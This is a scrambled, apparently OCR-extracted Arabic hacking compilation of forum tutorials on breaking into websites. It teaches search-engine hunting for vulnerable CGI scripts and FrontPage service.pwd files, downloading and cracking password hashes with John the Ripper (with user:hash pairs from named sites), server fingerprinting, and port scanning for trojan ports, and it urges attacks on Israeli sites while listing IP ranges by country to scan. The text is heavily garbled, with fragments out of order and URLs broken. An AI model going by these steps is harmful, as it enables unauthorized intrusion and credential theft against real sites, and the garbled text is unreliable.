‫والمزيد ‪.com‬‬ ‫تكتب في محرك البحث‬ ‫‪link:service.google..‬‬ ‫ويمكنك عمل الطريقة من ‪ DOS‬ولكن البرامج أسهل لك وأضمن لك‬ ‫======================================‬ ‫وألحين أكيد تبون تجربون على موقع أقولكم روحوا ‪google‬‬ ‫‪/http://www..pwd‬‬ ‫أو‪.‬‬ ‫انتهى‪،،،‬‬ ‫‪171‬‬ .‬‬ ‫‪link:adminstrators‬‬ ‫وغيرها من الملفات الحتمال وجود ‪ password‬فيها‪..com‬‬ ‫واكتبوا في إطار البحث‬ ‫‪/_vti_pvt‬‬ ‫وراح تطلعلك مواقع كثيرة تحتوي على هذه الثغرة‬ ‫وعندك محرك بحث‬ ‫‪/http://www.altavista.

cgi or pl‬إرجع لشرح زورو في رياضيات البحث( مثل‬ ‫نبحث عن لنك لملف بإسم ‪ help..cgi‬‬ ‫‪helpon=.4 sites‬لعينه ‪israel.reshet.com/cgi-‬‬ ‫‪bin/help..com‬وتشوف‬ ‫النتائج ‪ ،‬أو تشترك في القائمه البريده لـ سيكيورتي فوكس فهي مفيده جدا أنا شاركت من قبل فتره وجدا‬ ‫أعجبت بها وهي مختصه في المن وليس لـثغرات السي جي آي سكربت ‪ ،‬يعني امن واخبار وكل شئ ‪.tapuz.co.f2s.il/data/index..sites 54‬تنتهي بـ ‪ net.com‬وأكتب ‪) ، link:xxxx.‫" الختراق العشوائي "‬ ‫>ةةةةة<‬ ‫>ةةةةةة‪ :‬ةةةةةةة<‬ ‫ ماهو الـإختراق العشوائي ‪Random Hacking‬‬‫ تطويره بحيث يصبح يبحث على إستثمارات غير الـ ‪CGIScripts‬‬‫ كيف تستغل اي ثغره بعد الحصول عليها‬‫ ماهو الـإختراق العشوائي ‪Random Hacking‬‬‫هو البحث في كميه كبيره من المواقع عن ثغره محدده ‪ ،‬وهذا سهل ويعود بمواقع كثيره جدا جاهزه للختراق‬ ‫‪ ،‬مثال بسيط جدا ‪ ،‬روح على محرك بحث ‪ ،‬من محركات البحث التي تعتمد على الـ ‪ spiders‬أو العناكب‬ ‫مثل ‪ altavista.il‬‬ ‫‪/http://www..il‬و ‪ .example.htm‬‬ ‫وفيه كمان محركات بحث‬ ‫‪/http://www.walla.il/sites/sites.secure.il‬‬ ‫‪/http://www.co..co.cgi‬لتعرف اين مكانه ‪ ،‬لنفرض مكانه هنا ‪http://www.cgi‬‬ ‫أكتب بعد الملف غير العنوان ليصبح ?‪http://www.il‬و ‪1104‬‬ ‫‪ sites‬تنتهي بـ ‪ org.7‬وهذا ليس لب موضوعي ولكن هي بدايه ومثال ل تحفظه لني أحضرت أبسط مثال فقط فيوجد غيره‬ ‫مئات بل آلف ملفات الـ ‪ CGIScript‬تملك ثغرات مثل هذه واغلب إستثماراتها تكون من خلل ‪url‬‬ ‫للحصول على مثل هذه الستثمارات لثغرات ملفات السي جي آي سكريبت شوف الرشيف هذا وهو لغته‬ ‫روسيه أعتقد ولكن ما يهم لننا نبحث عن الـ ‪ Exploit‬أو الستثمار‬ ‫‪/http://www..1.com/cgi-bin/help.cgi ، link:help.‬الخ‬ ‫ تطويره بحيث يصبح يبحث على إستثمارات غير الـ ‪CGIScripts‬‬‫الختراق العشوائي إذا كان فعل عشوائي ‪ ،‬يعني تخترق اي موقع ولو بدون سبب فهذه همجيه !! ‪ ،‬لكن‬ ‫ممكن نستفيد منه إحنا في أنه ما يكون في شكل همجي ‪ ،‬أنا اقول لك كيف ‪ ،‬مثل إسرائيل اللي الكل يكرهها ‪،‬‬ ‫الذين يأمرون الفلسطينيين بأوقاف إطلق النار ‪ ، (:‬الكل يكرههم ليس لجل أنهم يهود ‪ ،‬ل نكرههم لنهم‬ ‫ظلموا فلسطين ‪ ،‬عندهم موقع فيه آلف من مواقعهم هذا هو ‪ sites 12610‬تنتهي بـ ‪ co..com/eng_ver/bugs‬‬ ‫وممكن تأخذ إسم المنتج مثل وتضعه في محرك البحث لـ ‪ /http://www.il‬و ‪ sites 70‬تنتهي بـ ‪ ac.securiteam.net .achla.sites 78‬تنتهي بـ ‪ gov.sites‬و ‪..il‬‬ ‫‪172‬‬ .example.il‬‬ ‫‪http://www.sites 137‬تنتهي بـ ‪ net‬و ‪ .121 sites‬و ‪ .il ./members/[member].org ..co..co.84 ،‬‬ ‫‪ ..sites‬عشان تحصل على كل هذه السايت روح الموقع هذا‬ ‫‪http://iguide.cgi‬المواقع المردوده لك نتيجه للبحث كلها تملك‬ ‫منتدى ‪ ، Ikonboard‬إفتح واحد منها وأبحث في المصدر الكود ‪ HTML‬عن السكربت الذي بحثت عنه‬ ‫‪ help..maven.il‬وهذه مهمه ‪ ،‬و‬ ‫‪ .cgi%00‬‬ ‫مع ملحظه تغيير ]‪ [member‬بإسم عضو وبدون القوسين ][ طبعا‬ ‫سوف يعرض لك معلومات العضو كامله ومن ظمنها كلمة المرور وهذه الثغره لـ المنتدى ‪Ikonboard‬‬ ‫‪ 2..il‬و ‪ .‬‬ ‫ويوجد برنامج تقدمه سيكيورتي فوكسي بإسم سيكيورتي فوكس بيجر ‪ ،‬هو برنامج لتسهيل عمليه الحصول‬ ‫على الخبار ووو‪.il‬و ‪ sites 2009‬تنتهي بـ ‪ ، com‬و‬ ‫‪ . .sites 29‬تنتهي بـ ‪ muni.co.vs?dw=1‬‬ ‫‪/http://www.edu .

MSIE 5..isp.‫‪http://www.. Windows 98‬‬ ‫‪Host: www.sa :8080‬وثم يرسل له أمر ‪ ، GET‬مثل ترسل للبروكسي‬ ‫‪GET http://www.il/find.html‬‬ ‫طريقه فحص عده مواقع بحثا عن منتج فيها أسميها انا ‪ Random Hacking‬يعني إختراق عشوائي ‪،‬‬ ‫ولكن لو فعل بحثت عن ‪ w3-msql‬في المواقع السرائليه فأنا أقول لك بأنك ما راح تلقى كثير أو لن تجد‬ ‫شئ ‪ ،‬ممكن تبحث عن ‪ /vti_pvt_/‬لترصد كل المواقع التي فيها فرونت بيج ‪ ،‬وطبعا بعد ما يتم حفظ كل‬ ‫المعلومات المسترجعه من البروكسي تكون بشكل ‪ HTML‬عشان كذا أنت خل الملف يكون بنسق *‪html..info..pl‬‬ ‫وفيه محرك أعدم منها واللي هو ‪altavista.il‬‬ ‫المهم على كل شخص منا أن يصلح فرز للبيانات الموجوده في هذه المواقع ‪ ،‬يستخدم اللغه التي يتقنها‬ ‫ليصنع برنامج يصلح فرز ويضعها في ملف تكست بدون اشياء ثانيه معها‬ ‫العمليه الثانيه هي البحث فيها كلها عن منتج ‪ ،‬مثل ‪ ، /w3-msql‬الطريقه سهله جدا ‪ ،‬أول يتم الشبك مع‬ ‫بروكسي مثل ‪ proxy..net.il‬‬ ‫‪Proxy-Connection: Keep-Alive‬‬ ‫وهو يطلب من البروكسي أحضار الموقع ‪ ، /http://www.‬واللي‬ ‫‪ Forbddien‬واللي ‪.2‬فيه مفسر بيرل ممتاز جدا افضل‬ ‫من أكتيف بيرل بعشرات المرات‪.il/cgi-bin/w3-msql/ HTTP/1.. image/pjpeg‬‬ ‫‪Accept-Language: ar-sa‬‬ ‫‪(User-Agent: Mozilla/4.htm‬‬ ‫وبالنسبه للمنتج أكتيف بيرل فقط تواجه فيه مشاكل ‪ ،‬لن بعض الـ ‪ Exploit‬كتب في الصدار أربعه وممكن‬ ‫خمسه وممكن ما يعمل زين في أكتايف بيرل لذلك قد تضطر لتغير المفسر عندك أو تعدل في الكود وهذا كله‬ ‫يطلب خبره في اللغه ‪ ،‬وعلى فكره ليونكس )أعمل على ‪( RedHat 6.5.securiteam.gov.com..0‬‬ ‫‪*/* . not found..‬‬ ‫وافتحه وتجد كل المواقع ‪ ،‬اللي كتب عنها ‪ The page cannot be displayed..sh‬وهو الذي يقابل ‪ Batch‬في ويندوز وتحدثنا عنها في كوكب‬ ‫لغات البرمجه ‪ ،‬من الدوس بعد ما تثبت أكتيف بيرل أكتب ‪ perl exploit.‬والباقي عليك‬ ‫ كيف تستغل اي ثغره بعد الحصول عليها‬‫إذا كانت ‪ url‬ما يبغا لها فلسفه ‪ ،‬كود ‪ c‬وما عرفت تشغله أو قابلت فيه أخطاء فممكن تبحث عن فرجون‬ ‫ثاني لـه ولكن بلغه ‪ perl‬أو ‪ Shell *..com. image/jpeg.com/exploits/2WUQBRFS3A.‬‬ ‫انتهى‪،،،‬‬ ‫‪173‬‬ .pl‬إذا كان الـ ‪ exploit‬بلغه‬ ‫بيرل ولكن طبعا فيه أشياء تغييرها في الكود نفسه ‪ ،‬وهذه الشياء تكون مكتوبه بين علمات التعليقات ‪(:‬‬ ‫وأكيد بتواجه مشاكل إذا ما تعرف شئ في بيرل ‪ ،‬في هذه الناحيه ل تطلب شرح بالصور ‪ (:‬إذا رجع لك رد‬ ‫طويل ما قدرت تقراه ممكن تحفظ الخرج عن طريق علمة > وثم مسافه وإسم الملف مثل ‪perl‬‬ ‫‪exploit.‬الخ ‪ ،‬من هذه الردود تعرف اللي نت فاوند وال موجود ولكن‬ ‫غير مسموح بالوصول له ‪.‬الخ بهذه الطريقه تعرف اللي موجود عليه واللي مو موجود ‪..Accept: image/gif.pl > log.il/cgi-bin‬يتضح طلبنا لـ ‪cgi-‬‬ ‫‪ ، /bin/w3-msql‬في الحقيقه ل نبحث عن ثغرات سي جي آي ‪ ،‬ولكن نبحث عن كل المواقع التي يوجد‬ ‫بها المنتج ‪ ، WWWMSQL‬يعني المواقع السرائليه مثل التي جمعناها في ملف تكست كلها تأخذ واحد‬ ‫واحد وتدخل في البرنامج الذي صممناه وترسل الى البروكسي بحثا عن ‪ cgi-bin/w3-msql‬وثم يحفظ‬ ‫رد البروكسي في ملف خارجي ‪ ،‬وهكذا حتى ننتهي من كل المواقع ‪ ،‬وثم نفتح الملف ونشوف التي تم إيجاد‬ ‫المنتج ‪ WWWMSQL‬داخها والتي لم يوجد ‪ ،‬ونتوجه الى سيكيورتي فوكس وال سيكيورتي تيم وال أي‬ ‫موقع يعجبك وابحث عن ‪ ، w3-msql‬مثل في سيكوتي تيم نجد ‪ Exploit‬لـ ‪ w3-msql‬يمكن تطبيقه‬ ‫من المتصفح ‪ ،‬وهو هنا ‪http://www.co.. image/x-xbitmap.0 (compatible.com.

‬ومواقع قليل مقفلة ثغراتها(‬ ‫‪ :apache‬من مجموعة مبرمجين متوزعين في انحاء العالم واختراقها شبه صعب‪..org‬‬ ‫راح يطلع لنا التالي‬ ‫‪The site www.org is running Microsoft-IIS/5.‫" الطريقة الصحيحة والمثلى في اختراق المواقع "‬ ‫>ةةةةة<‬ ‫>ةةةةةة‪< marwan911 :‬‬ ‫اول خطوة في الختراق واللي هي اخذ المعلومات‬ ‫يعني نعرف الموقع الفلني شنهو الملقم اللي شغال عليه والنظام والخدمات اللي يدعمها‪.whitehouse.‬‬ ‫الملقمات اشهرها اثنين‬ ‫‪ :IIS‬من مايكروسوفت وهذه مليانة ثغرات‪) .com/up/graph.0‬‬ ‫ثاني شيء شغال على نظام ويندوز ‪2000‬‬ ‫حلو‬ ‫‪174‬‬ .netcraft.net‬‬ ‫ادخله‬ ‫تلقي مربع‬ ‫هنا تحط فيه الموقع اللي تبي تعرف المعلومات اللي فوق‬ ‫مثل نحط موقع البيت البيض اللي هو ‪whitehouse.0 on Windows‬‬ ‫‪2000‬‬ ‫طيب‬ ‫الحين عرفنا معلومتين مهمتين‬ ‫اول شيء انه شغال على الملقم ‪IIS5...netcraft.‬‬ ‫طيب‬ ‫الحين عندنا موقع‬ ‫وشلون نعرف نظام التشغيل والملقم والخدمات والمعلومات كلها‬ ‫عندك الموقع ‪http://www.org‬‬ ‫ملحظة‪ :‬نكتبه من غير ‪ //:http‬ول ‪ /‬اللي بالخير‬ ‫‪http://uptime.whitehouse.

2.3.‬‬ ‫نشوف دعم الفرونت بيج‬ ‫زي ماقلنا الفرونت بيج مليان ثغرات‬ ‫وثغراته قوية وكثيرة تقريبا‬ ‫منها مجلد _‪ vti_pvt‬و _‪ private‬هذه اللي نحتاجها غيره مامنه فايدة‬ ‫‪175‬‬ .0.arank.8 PHP/4.26 mod_bwlimited/0.9.3.0.6‬‬ ‫‪mod_log_bytes/0.3.‬‬ ‫طيب لو كان السيرفر اباتشي؟‬ ‫خلونا ناخذ مثال موقع ارانك ‪www.6‬‬ ‫‪on Linux‬‬ ‫طيب هنا يهمنا ثلث اشياء‬ ‫الملقم وهو ‪ apache 1.2510 mod_ssl/2.4 OpenSSL/0.2.‫اول شيء نجرب ثغرات ‪ IIS5.0‬عليه )راح احطها بعد الموضوع(‬ ‫إذا مانفع شيء نشوف ثغرات نظام ويندوز ‪) 2000‬راح احط الموقع بعد الموضوع(‬ ‫طيب‬ ‫الحين فيه حاجة اسمها يوني كود‬ ‫هذه تخترق فيها عن طريق المتصفح‬ ‫وماتمشي إل مع ملقمات ‪ IIS‬وهي عبارة عن عناوين طويلة تحطها بعد عنوان الموقع‪ .com is running Apache/1.8.‬راح احط امثلة‬ ‫عليها‪.2510‬وهذه مليانة ثغرات‬ ‫والثالث النظام وهو ‪Linux‬‬ ‫طيب‬ ‫الملقم‬ ‫اول شيء اباتشي من الملقمات الصعبة الختراق إل بعض الصدارات منها فنحط هذه على جنب‪.3 FrontPage/5.arank.com‬‬ ‫لو حللناه بالنيت كرافت راح نشوف النتيجة التالية‬ ‫)‪The site www.0.20 (Unix‬‬ ‫‪mod_gzip/1.1a mod_perl/1.‬‬ ‫طيب لنفرض انه ماطلع فيها ثغرات؟‬ ‫نشوف محتويات الموقع نفسه‬ ‫نشوف إن كان عنده سجل زوار او منتدى او او او ونطلع ثغراتها من الموقع اللي راح ارفقه في الرد اللي‬ ‫بعد الموضوع‪.19.20‬و دعم فرونت بيج ‪ FrontPage/5.

pwd‬‬ ‫و ‪ adminstators.‬‬ ‫انتهى‪،،،‬‬ ‫‪176‬‬ .sk‬هذا الموقع مفيد جدا تكتب مثل )فوق بالمربع اللي عاليمين( ‪ IIS‬او‬ ‫‪ apache‬او منتدى واصدارته او اي برنامج ويطلع لك ثغراته‬ ‫‪ /http://www.pwd‬و ‪authors.‬ومنوعة من ‪ c‬و ‪ perl‬و‬ ‫يوني كود‪.sa/_vti_pvt/service.‫داخل المجلدين راح نلقي اربع ملفات مهمة وهي ‪ service.com‬الموقع هذا خطير جدًا جداً تروح ل ‪ EXPLOITS‬اللي عاليسار‬ ‫وتختار اول اختيار هنا ثغرات جميع النظمة من لينكس و ويندوز و و و الخ‪ .pwd‬ويعتبر هذا اخطر ملف‬ ‫طيب لو قدرنا ننزل واحد من الملفات هذه )ملحظة الثغرة هذه موجودة ب ‪ %70‬من المواقع الموجودة‬ ‫عالنت( لو نزلناها نفتحها بالمفكرة ونلقي السطر هذا على سبيل المثال‬ ‫‪goodyco:CalXS8USl4TGM‬‬ ‫وهذا من موقع قودي ‪http://www.FILE‬‬ ‫وعاد استناه يطلع لك الباسس‬ ‫طيب نروح للفقرة الثالثة واللي هي النظام‬ ‫زي ماشفنا النظام هو لينكس‬ ‫لكن لينكس ايش؟ فيه ريد هات و ماندريك وفيه منه إصدارت كثير وثغرات اكثر‬ ‫لكن هنا راح تواجهك مشكلتين‬ ‫اول شيء معرفة النظام تقدر تطلعه من ابدا وتشغيل ول ‪ telnet‬واكتب عنوان الموقع يطلع لك النظام فوق‬ ‫نوعه وإصدارته‬ ‫المشكلة الثانية لزم يكون عندك لينكس اصل‬ ‫علشان ثغراته بلغة ال ‪ c‬وهذه ماتشتغل إل عاللينكس فقط‬ ‫================‬ ‫‪ /http://neworder.ussrback.pwd‬و ‪ users.pwd‬‬ ‫طيب الحين ‪ goodyco‬اليوزر والباسس مشفر واللي هو ‪CalXS8USl4TGM‬‬ ‫وشلون ينفك؟ ينفك ببرنامج اسمه ‪john the repaier‬‬ ‫تنزله وتحط الملف المشفر )مع اليوزر( بمجلد واحد وتفتح الدوس وتروح لمجلد جوهن وتكتب السطر التالي‬ ‫‪john -i PASSWORD.goody.com.box..

‬عليك بأتجاه للموقع المراد اختراقه‬ ‫حيث يجب عليك دراسة الموقع كامل من حيث عدة عوامل اهمها‬ ‫‪ ( -1‬نظام السيرفر والمستخدم في الموقع وينقسم السيرفر الى نوعين‬ ‫ا ( ‪ -‬النوع الول هو ‪ ) IIS‬اي اي اس (‬ ‫ب ( ‪ -‬النوع الثاني ‪ ) apachc‬اباشي (‬ ‫‪ ( -2‬ملحظة وجود محرك بحث في الموقع ام ل‬ ‫‪ ( -3‬معرفة وقت الذروه لزوار الموقع ووقت الخمول‬ ‫‪ ( -4‬معرفة اليبي للموقع‬ ‫تقريبا هذه اهم العوامل المتخذه كعوامل مطلوبه جدا لتنفيذ العمليه وهذه تاخذ‬ ‫وقت حيث ان كل شي مايجي بالساهل‬ ‫سبق وذكرنا السيرفر ‪ IIS‬والداعم لبعض المواقع وهذا امره تقريبا سهل حيث ان‬ ‫اغلب من يستعمل هذه الطريقه هم من الهواه‬ ‫حيث ان ثغرات تقريبا سهله واختراقها ايضا مرتبط بأن تكون الثغرات التي لديك‬ ‫جديده و طااازه‬ ‫وشوية صبر بالستعانه بال ثم ببعض البرامج المساعده وسوف تححق نجاحاتك‬ ‫بأذن ال ‪.‬‬ ‫انتهى‪،،،‬‬ ‫‪177‬‬ .‬‬ ‫سيرفر ‪ apachc‬وهذا السيرفر قوي جدا وغالبا ل يعمل على البحث عن ثغراته‬ ‫سوى المحترفون ‪ .‬لنه يتطلب عدة امور ل يستطيع عملها ال من له خبره‬ ‫بنظام ليونكس ويعرف بعض لغات البرمجه ‪.‫" نبذه يسيرة ومبسطة عن كيفية اختراق المواقع "‬ ‫>ةةةةة ةة ةةةةةةة ةةةة ةة<‬ ‫>ةةةةةة‪:‬‬ ‫ركز معي‬ ‫هذا سؤال يحير الجميع بالذات المبتدئين ‪ .

‬هيكون فيه‬ ‫مجلدين‪ .‬لكني ماأعرف أستخدم هذا البرنامج ‪ . FrontPage‬وبتمكنك من معرفة كلمة سر الدمين تبع الموقع ‪(:‬‬ ‫وكلمات السر هذه بتكون موجودة في الملفات التالية‪:‬‬ ‫‪Administrator. run‬أوكى ؟؟‬ ‫‪178‬‬ .‬أنا في الخدمة ‪ .tradesystemlab.‬‬ ‫ج*‪ :‬تفضل حبيبي ‪ .‬وسيطلب منك الموقع اسم‬ ‫المستخدم وكلمة المرور للموقع ‪(:‬‬ ‫س ‪ :4‬مشكور حبيبي ولكن ليش مايدخل باسم المستخدم وكلمة السر هذه ‪:‬‬ ‫‪ tradesys:FpNTpIDWSk872‬؟؟ )‪(N‬‬ ‫ج ‪ :4‬بكل بساطه لنها مشفرة !! ‪ . run‬شوف‪ :‬عشان تسهل على نفسك وبدل ماتفتح الدوس‬ ‫وتدخل على مجلد البرنامج وهالمشاكل وكمان البعض ما بيعرف يعمل هالشياء ‪: p:‬‬ ‫ابحث في جهازك عن‪ command.pwd‬هتلقي مكتوب بداخله هكذا تقريبا‪:‬‬ ‫‪-FrontPage.‬بس ياريت ماتكون عن اختراق الجهزة ‪ .‬يمكنك فك تشفيرها عن طريق برنامج مثل برنامج ‪John The‬‬ ‫‪ .com/_vti_pvt/service.pwd‬‬ ‫‪Users.‫" )>س&ج<( في اختراق المواقع للمبتدئين "‬ ‫>ةةةةة ةة ةةةةة ةةة ةةة<‬ ‫>ةةةةةة‪ :‬ةةةةةة ةةةةةة<‬ ‫س*‪ :‬السلم عليكم أخي القناص العربي‪(:‬‬ ‫ج*‪ :‬أهلين القناص العربي المزيف ‪D:‬‬ ‫س*‪ :‬أحم أحم ‪ .‬أنا تطوت كثير ‪(:‬‬ ‫ج*‪ :‬أوكى تفضل ‪(:‬‬ ‫س ‪ :2‬لقد سمعت كثيرا عن ثغرات الفرونت بيج ‪ .pwd‬‬ ‫‪Administrators.pwd :‬‬ ‫وبعد فتح الملف ‪ service.‬ممكن تشرحهولي أخي العزيز القناص لو سمحت ؟؟‬ ‫ج ‪ :5‬لتستأذن مني ياولد !! ‪ .‬‬ ‫ج ‪ :2‬بالتأكيد حبي ومن عيوني الثنين ‪D:‬‬ ‫طبعا ثغرات الفرونت بيج بتكون موجودة في أنظمة التشغيل ‪ NT & Unix‬التي يدعم سيرفراتها الـ‬ ‫‪ . (:‬شوف‪ :‬انت أول ماتنزل البرنامج وتفك ضغطه ‪ .‬ولعب العيال هذا !!‬ ‫س*‪ :‬ل ل ‪ .ebnmasr. doc & run :‬الي يهمنا هو مجلد ‪ .com :‬وقم بموضعه في شريط العنوان ‪ .com :‬وقم بنسخه والصقه في مجلد ‪ .‬ولكن كيف أدخل على الموقع كأدمين بهذه الكلمات ؟؟ ‪S:‬‬ ‫ج‪ :‬يمكنك استخدام برنامج اف تي بي مثل برنامج ‪ . WS_FTP‬أو ضع بدل ‪ www‬في عنوان الموقع كلمة‬ ‫‪ ftp‬مثل هذا‪ ftp.com/john :‬‬ ‫س ‪ :5‬أها ‪ .#‬‬ ‫‪tradesys:FpNTpIDWSk872‬‬ ‫وهذه كلمة السر المشفرة واسم المستخدم ‪(:‬‬ ‫س ‪ :3‬أووووه واااااو ممتاز ‪ .openwall.‬هل يمكنك توضيح طريقة استخدام هذه الثغرة ‪.pwd‬‬ ‫‪Authors. Ripper‬نزله من هنا‪http://www.pwd‬‬ ‫التي بتكون عادة في المجلد _‪vti_pvt‬‬ ‫مثل هذه الملف مثل‪(: http://www.‬أنا كنت عايز أسألك شوية أسألة في الهاكنج‪.

‬ممكن تقولي كيف جبت هالثغرة من الموقع ؟؟ ‪$:‬‬ ‫ج ‪ :8‬هههههههههه ‪ .‬ولكن انت لو كان‬ ‫عنك موقع ممكن تعمل عليه سكان ببرنامج فحص مثل برنامج عمران ) المفضل لدي ‪ ( D:‬عشان تطلع‬ ‫الثغرات الموجودة بالموقع ‪(:‬‬ ‫س ‪ :9‬طيب أنا عندي سؤالين عالجواب الي فات ده ‪ .‬هذه‪(: (: (: service.( ‪ .‬هتكتب ايه ؟؟ ‪ .‬وتطلعلك النتائج ‪ . EXPLOITES‬هذا‬ ‫هو‪.‬‬ ‫س ‪ :10‬ممممم ‪ .‬مانت كاتب غير كلمة واحدة ‪ .exe‬افتح ‪ command.‬هذه الطريقة ‪ :‬انك تبحث عن ثغرة معينة في محرك بحث يستخدم الـ ‪ spiders‬عشان تلقي‬ ‫مواقع كثيييرة فيها الثغرة هذه ‪ . $:‬يعني انت مثل عايز تبحث عن‬ ‫الثغرة التي تم ذكرها سابقا ‪ .txt‬ليبحث لك عن الحروف الصغيرة‬ ‫‪ << john -i:all passwd.com‬واكتب فيه الوامر التالية‪:‬‬ ‫‪ << john -single passwd.txt‬ليبحث لك عن جميع الحتمالت ‪ ) .ussrback.‬مشكور حبيبي ‪ . (:‬ايه طريقة البحث العشوائي هذه‬ ‫؟؟‬ ‫ج‪ :‬أحم أحم ‪ .‬متأكد أنه هيفك تشفيرها ؟؟‬ ‫ج ‪ :6‬أيوووووه لزم يفك تشفيرها في النهاية ‪ ..‫وجيب كلمة السر هذه‪ tradesys:FpNTpIDWSk872 :‬وحطها في ملف ‪ txt‬باسم ‪ passwd‬مثل‬ ‫وضعه في مجلد ‪ .‬هأسأل واحد الول ‪ .‬خلص انفكت كلمة السر )‪ .‬البرنامج طول كثير ‪ . run‬ول تقم بفتح ‪ . (:‬وفي موقع رهيييب عشان تجيب منه الـ ‪ .‬‬ ‫عشان كده بتطول عملية الفك معي ‪( D:‬‬ ‫وبعدما ينتهي البرنامج من فك الكلمة ستجد كلمة السر المشفرة والمفكوكه بالملف هذا‪john.‬أنا بصراحة جبتها بالبحث العشوائي ‪ .com :‬‬ ‫انتهى‪،،،‬‬ ‫‪179‬‬ .( ‪. EXPLOITES‬وبتبدأ تجرب ثغرة‬ ‫ثغرة على الموقع ‪ .txt‬ليبحث لك عن الكلمات السرية التي تكون مطابقه لسم المستخدم‬ ‫‪ << john -i:Digits passwd.. (Y‬لكن وين اسم المستخدم ؟؟‬ ‫ج ‪ :7‬في كلمة السر هذه‪ .‬وأنا على طول أستخدم هذا المر ‪.‬لكن لن أقولك لك على أي واحدة‬ ‫منها ‪ .il :‬وطبعا هذا موقع اسرائيلي ‪ .‬عشان معظم النتائج تكون مواقع‬ ‫اسرائيلية . /http://www.‬وليه هالوجه الخجلن .txt‬ليبحث لك عن الرقام فقط‬ ‫‪ << john -i:Alpha passwd.co.‬كيف يعني تبحث عن ثغرة معينه ؟؟ ‪ .‬في طبعا مواقع كثيرة بتستخدم السبايدرز ‪ .‬‬ ‫وممكن تعرف حالة البرنامج بالضغط على أي زر من لوحة المفاتيح ‪(:‬‬ ‫س ‪ :7‬الحمد ل ‪ .‬مافهمتك زين !!‬ ‫ج ‪ :10‬أنا وال ماأستخدم هالمواقع ال للبحث عن ثغرات الفرونت بيج ‪ .‬لنه بيجرب جميع الحتمالت‪.‬كنت عايز أسألك كمان عن كيفية عمل برامج السكان على الثغرات ‪(:‬‬ ‫ج ‪ :11‬البرامج هذه بتكون فيها مجموعة كبيرة من الثغرات أو الـ ‪ .pwd :‬‬ ‫س ‪ :11‬أهاااااا ‪ .‬ال هذا الموقع‪ walla.pot :‬‬ ‫س ‪ :6‬يااااااه ‪ .‬حتى لو أخذ أسبوع . tradesys:FpNTpIDWSk872 :‬هيكون اسم المستخدم‪tradesys :‬‬ ‫) يعني الكلمة الي بتكون قبل علمة ‪( :‬‬ ‫س ‪ :8‬قنااااااص ‪ . john.( ‪ .

‬‬ ‫وصلة البرنامج‪.‬‬ ‫رقم ‪ 4‬تضع العنوان للضحية‪.ayna.‬‬ ‫رقم ‪ 2‬أظهار الكودات المستخدمة‪.‬‬ ‫رقم ‪ 3‬بدأ البحث‪.‫" برنامج ‪ CgiScaner‬للبحث عن الثغرات "‬ ‫>ةةةةة<‬ ‫>ةةةةةة‪ :‬ةة ةةةة<‬ ‫هنا برنامج رائع للبحث عن الثغرات‬ ‫رقم ‪ 1‬خروج‪.‬‬ ‫‪http://mypage.zip‬‬ ‫انتهى‪،،،‬‬ ‫‪180‬‬ .‬‬ ‫وأترك البرنامج وسوف يظهر لك الثغرات الموجودة فى الموقع‪..com/vox99/cgiscan3.

.‬لن بعض البرامج يكون فيها الباحث ضعيف ول يصيد‬ ‫اي اي بي به منفذ مفتوح ومن امثلة ذلك برنامج السب سفن جولد ‪ ..‬رغم ان‬ ‫البرنامج وقوة اتصاله ممتازه ال ان الباحث ضعيف فنستخدم هذا البرنامج كاداة‬ ‫مساعده ’’’’’ ول اطيل عليكم بالكلم اليكم الشرح‬ ‫انا شرحت البرنامج رغم سهولته وفوق ذلك معرب‬ ‫ولكن البعض ليعرف استخدامه ‪ ..‫" شرح برنامج سوبر سكان لمعرفة المنافذ المفتوحة في‬ ‫المواقع "‬ ‫>ةةةةة ةة ةةةةةةة ةةةة ةة<‬ ‫>ةةةةةة‪ :‬ةةةةةة<‬ ‫تعريف بالبرنامج ‪ :::‬هذا البرنامج يقوم بالبحث عن المنافذ المفتوحه في جهاز‬ ‫الضحيه ‪ .‬اليكم واجهة البرنامج‬ ‫‪181‬‬ ...

..‬انتهى و‪. 1243‬‬ ‫المراد البحث فيه مث ً‬ ‫انظر الصوره التاليه ؟‬ ‫في رقم واحد نكتب المنفذ الذي نريد البحث فيه‬ ‫رقم اثنين لكي نضيف المنفذ **ملحظه نقدر نضيف اكثر من منفذ‬ ‫بعد ماننتهي من اضافة المنفذ نضغط اوكي للتأكيد ونتأكد من ان المنفذ قد‬ ‫اضفناه كما في الصوره ‪..‬‬ ‫بعد ذلك نرجع للصوره الولى ونضبط الخيارات كما هو موضح‬ ‫ونحدد الي بي من ‪ ------------‬الى‬ ‫بعد ذلك نضغط ابــــــــــــدأ فتظهر لنا الي بيات والي بي الذي به منفذ مفتوح‬ ‫نحصل علمة ‪ +‬على يساره عندما نضغط عليه يظهر لنا المنفذ المفتوح‬ ‫كما في الصوره الولى ‪....‫ثلث خطوات تقوم بها وهي كالتالي ‪::‬‬ ‫انظر اعلى اليمين تجد قائمة المنافذ ادخل قائمة المنافذ لتحديد المنفذ‬ ‫ل السب سفن المنفذ الخاص به ‪ 27374‬او ‪..‬‬ ‫‪182‬‬ ....

1‬الكويت‬ ‫‪ <-----------194.6.198.117.255<------------206.200.1‬البحرين‬ ‫‪183‬‬ .229.227.255.1‬السعوديه‬ ‫‪ <-----------212.255<--------------212.88.238.29.2.75.224.255----------------216.113.143.116.255<------------193.80.255<--------------208.72.1‬أسرائيل‬ ‫‪<-------192.1‬أسرائيل‬ ‫‪<-------193.1‬أسرائيل‬ ‫‪<-------212.255---------------192.1‬أسرائيل‬ ‫‪ <------------212.82.42.255.1‬أسرائيل‬ ‫‪<--------139.8.1‬المارات‬ ‫‪<-----------213.150.255-----------------62.195.120.40.1‬أسرائيل‬ ‫‪<--------199.238.102.255.42.1‬الكويت‬ ‫‪<----------168.25<-------------194.133.255<-------------212.255---------------212.133.49.1‬المارات‬ ‫‪<-----------194.1.203.1‬السعوديه‬ ‫‪ <-----------195.39.150.60.255<--------------213.255.25.255--------------192.1‬الكويت‬ ‫‪<----------195.204.31.255<-------------213.240.92.203.82.255<------------195.32.225<--------------212.1‬أسرائيل‬ ‫‪<---------213.255<-------------168.1‬أسرائيل‬ ‫‪<--------212.102.255<-----------195.1.255.116.com/a7lla1/superscan.255<-----------195.255---------------209.139.‬‬ ‫‪http://mypage.1.zip‬‬ ‫خذوا هذه اليبات وبحثوا فيها شدوا حيلكم في اليبيات الولى‬ ‫‪<--------212.1‬المارات‬ ‫‪ <-------------208.117.255--------------193.1‬أسرائيل‬ ‫‪<----------62.26.1.30.255---------------212.180.29.1‬عمان‬ ‫‪ <-------------212.1‬المارات‬ ‫‪ <----------195.1‬السعوديه‬ ‫‪ 